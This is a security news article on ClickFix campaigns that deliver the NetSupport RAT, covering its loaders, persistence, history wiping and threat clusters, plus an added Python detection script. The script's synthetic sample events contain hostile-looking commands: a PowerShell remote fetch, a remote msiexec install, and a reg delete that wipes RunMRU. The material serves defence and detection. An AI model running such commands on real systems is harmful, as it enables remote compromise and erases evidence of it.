Cybercriminals are increasingly using a technique known as “ClickFix” to deploy the NetSupport remote administration tool (RAT) for malicious purposes.
According to a new report from eSentire’s Threat Response Unit (TRU), threat actors have shifted their primary delivery strategy from fake software updates to the ClickFix initial access vector throughout 2025.
This method abuses a legitimate remote support service to trick users into granting attackers control over their systems.
The attack leverages social engineering, where victims are lured to a ClickFix page and instructed to paste a malicious command into their Windows Run Prompt.
Executing this command triggers a multi-stage infection process, starting with a loader script that downloads and installs the NetSupport RAT, giving attackers full remote control over the compromised machine.

Evolving Loader Tactics
TRU researchers have identified several distinct loader types used in these campaigns. The most prevalent is a PowerShell-based loader that fetches a JSON file containing the NetSupport payloads encoded in Base64.
The script then decodes these payloads, writes them to a hidden directory, and establishes persistence by creating a shortcut in the Windows startup folder. This ensures the RAT runs automatically every time the system reboots.


A more recent variant of the PowerShell loader attempts to cover its tracks by deleting registry values from the RunMRU key, which stores the history of commands entered in the Run prompt, effectively erasing evidence of the initial command execution.
A less common but still notable method involves using the legitimate Windows Installer service (msiexec.exe) to download and run malicious MSI packages that ultimately deploy the RAT. These evolving tactics show that attackers are actively refining their methods to evade detection and analysis.
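Detection logic for the three loader behaviours described in this section (an explorer.exe-parented interpreter fetching from a URL after a Run-prompt paste, msiexec installing a package straight from a URL, and the RunMRU history being wiped), written as an added example that is not part of eSentire's report or this article. It assumes Sysmon Event ID 1 field names (ParentImage, Image, CommandLine) and runs over constructed sample events, not real telemetry.

```python
import re

# Constructed Sysmon-style process-creation events (EventID 1 fields); these
# are synthetic records written for this example, not captured telemetry.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -c "iwr https://example.invalid/stage.json"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "msiexec /i https://example.invalid/update.msi /qn"},
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
]

# Commands pasted into the Run prompt are spawned by explorer.exe, so an
# explorer-parented interpreter reaching out to a URL matches the ClickFix
# shape. explorer.exe also parents double-clicked shortcuts, so this is a
# coarse filter to enrich with further context, not a verdict on its own.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "msiexec.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
# msiexec installing a package straight from a URL (the MSI loader variant).
REMOTE_MSI_RE = re.compile(r"msiexec(\.exe)?\s.*(/i|/package)\s+https?://", re.IGNORECASE)
# Deleting Run-prompt history (RunMRU) through reg.exe or PowerShell cmdlets.
RUNMRU_RE = re.compile(r"(reg(\.exe)?\s+delete|Remove-Item(Property)?).*RunMRU", re.IGNORECASE)

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def classify(event: dict) -> list:
    """Return the names of the detection rules one event triggers."""
    hits = []
    image, parent = basename(event["Image"]), basename(event["ParentImage"])
    cmd = event["CommandLine"]
    if parent == "explorer.exe" and image in INTERPRETERS and URL_RE.search(cmd):
        hits.append("run_prompt_remote_fetch")
    if REMOTE_MSI_RE.search(cmd):
        hits.append("msiexec_remote_package")
    if RUNMRU_RE.search(cmd):
        hits.append("runmru_wipe")
    return hits

def triage(events: list) -> list:
    """Pair each event index with its rule hits, skipping clean events."""
    return [(i, h) for i, e in enumerate(events) if (h := classify(e))]
```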
Tracking the Threat Actors
Analysis of the campaigns has allowed researchers to cluster the activity into three distinct threat groups based on their tools and infrastructure.
The first, dubbed the “EVALUSION” campaign, is highly active and uses a wide variety of loaders and infrastructure spread across multiple countries. The “FSHGDREE32/SGI” cluster primarily uses bulletproof hosting in Eastern Europe.
A third, separate actor tracked as “XMLCTL” or UAC-0050, uses different techniques, including MSI-based loaders and commercial US-based hosting, suggesting a different operational playbook.
To combat these threats, experts recommend organizations disable the Run prompt via Group Policy, block unapproved remote management tools, and implement robust security awareness training for employees.